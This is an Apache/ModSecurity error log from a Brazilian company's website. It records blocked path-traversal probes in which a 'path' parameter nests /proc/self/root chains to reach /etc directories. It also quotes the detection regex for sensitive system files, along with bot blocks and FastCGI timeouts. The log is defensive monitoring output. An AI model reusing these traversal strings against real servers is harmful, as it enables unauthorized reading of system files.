[Thu Mar 19 07:58:55.295190 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:36782] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvW78df6f5d65gmYZReogAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 07:59:10.100203 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.244.43:48272] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvW_vu8EFLIOrSqIpuMUAAAAk0"]
[Thu Mar 19 07:59:16.121798 2026] [proxy_fcgi:error] [pid 19093:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:57510] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:59:22.539412 2026] [:error] [pid 27403:tid 140411649607424] [client 74.7.243.128:46558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvXChkFeYa1D6dYQnDZywAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 07:59:38.133812 2026] [proxy_fcgi:error] [pid 17653:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58124] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:00:00.793779 2026] [proxy_fcgi:error] [pid 27403:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:58652] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:00:13.488625 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:38890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvXPcdf6f5d65gmYZRe5AAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:00:27.145821 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:59142] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:00:57.406205 2026] [proxy_fcgi:error] [pid 17653:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:59842] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:00:57.928922 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:49426] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvXaeyqAr6etmhZHNpM_wAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:01:11.605560 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:37316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvXdsdf6f5d65gmYZRe_AAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:01:12.525167 2026] [core:alert] [pid 17887:tid 140411582465792] [client 57.141.18.57:35018] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 08:01:26.302809 2026] [:error] [pid 14269:tid 140411691570944] [client 74.7.243.128:48774] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvXhgbLMZ6AikZjR9VHbAAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:01:27.141879 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:60622] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:01:48.587751 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:46806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvXnAkwaGbbGflqUZCmlgAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:02:00.141874 2026] [proxy_fcgi:error] [pid 17653:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:33198] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:02:05.138757 2026] [:error] [pid 27403:tid 140411590858496] [client 74.7.228.61:45534] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvXrRkFeYa1D6dYQnDaOwAAAdI"]
[Thu Mar 19 08:02:34.133802 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:34060] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:02:59.128034 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:34776] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:03:22.163690 2026] [proxy_fcgi:error] [pid 31803:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:35342] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:03:44.167023 2026] [proxy_fcgi:error] [pid 19093:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35892] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:04:07.141819 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:36552] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:04:12.242968 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.244.43:36234] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvYLAkwaGbbGflqUZCnCAAAAMw"]
[Thu Mar 19 08:04:30.621788 2026] [proxy_fcgi:error] [pid 26799:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:37146] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:04:51.943621 2026] [:error] [pid 14269:tid 140411565680384] [client 74.7.243.128:56686] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvYUwbLMZ6AikZjR9VH1wAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:04:53.137781 2026] [proxy_fcgi:error] [pid 19093:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:37816] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:05:15.069805 2026] [proxy_fcgi:error] [pid 31803:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:38354] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:05:39.089805 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39050] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:06:03.665796 2026] [proxy_fcgi:error] [pid 17653:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:39624] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:06:13.376222 2026] [:error] [pid 27403:tid 140411674785536] [client 74.7.243.128:59410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvYpRkFeYa1D6dYQnDbGwAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:06:29.185789 2026] [proxy_fcgi:error] [pid 27293:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:40326] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:06:30.372935 2026] [mime_magic:error] [pid 15826:tid 140411649607424] (70014)End of file found: [client 57.141.18.11:42878] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:06:55.082414 2026] [proxy_fcgi:error] [pid 14269:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:40904] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:06:57.203195 2026] [mime_magic:error] [pid 27293:tid 140411741927168] (70014)End of file found: [client 57.141.18.1:43948] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:07:09.635895 2026] [mime_magic:error] [pid 14269:tid 140411590858496] (70014)End of file found: [client 57.141.18.101:44116] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:07:12.685912 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.228.61:51506] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvY4Pu8EFLIOrSqIpuNkQAAAlc"]
[Thu Mar 19 08:07:23.129812 2026] [proxy_fcgi:error] [pid 27403:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:41690] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:07:26.875471 2026] [core:alert] [pid 19093:tid 140411683178240] [client 57.141.18.112:44788] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 08:07:26.968455 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:33822] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvY7sdf6f5d65gmYZRfzAAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:07:49.537847 2026] [proxy_fcgi:error] [pid 19093:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42456] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:08:17.089866 2026] [proxy_fcgi:error] [pid 19093:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43178] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:08:18.019462 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:33450] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvZIta6ubjKNq_cu4Y4JAAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:08:30.497771 2026] [core:alert] [pid 19093:tid 140411590858496] [client 57.141.18.57:45826] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 08:08:40.249979 2026] [core:alert] [pid 30077:tid 140411733534464] [client 57.141.18.16:46062] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 08:08:43.432033 2026] [:error] [pid 27293:tid 140411716749056] [client 74.7.243.128:60744] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvZO_-YZRR_7pZ7nDJ4-AAAA8M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 08:08:47.137941 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:43816] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:09:15.069824 2026] [proxy_fcgi:error] [pid 14269:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:44584] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:09:15.519419 2026] [:error] [pid 27403:tid 140411616036608] [client 74.7.244.43:52468] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvZWxkFeYa1D6dYQnDbhwAAAc8"]
[Thu Mar 19 08:09:37.287945 2026] [proxy_fcgi:error] [pid 17653:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45134] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:09:59.985261 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:58758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvZhwkwaGbbGflqUZCn6wAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:10:03.815305 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:34100] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvZi_u8EFLIOrSqIpuN1wAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:10:04.162883 2026] [proxy_fcgi:error] [pid 19093:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:45858] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:10:06.347284 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:34100] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvZjvu8EFLIOrSqIpuN2QAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
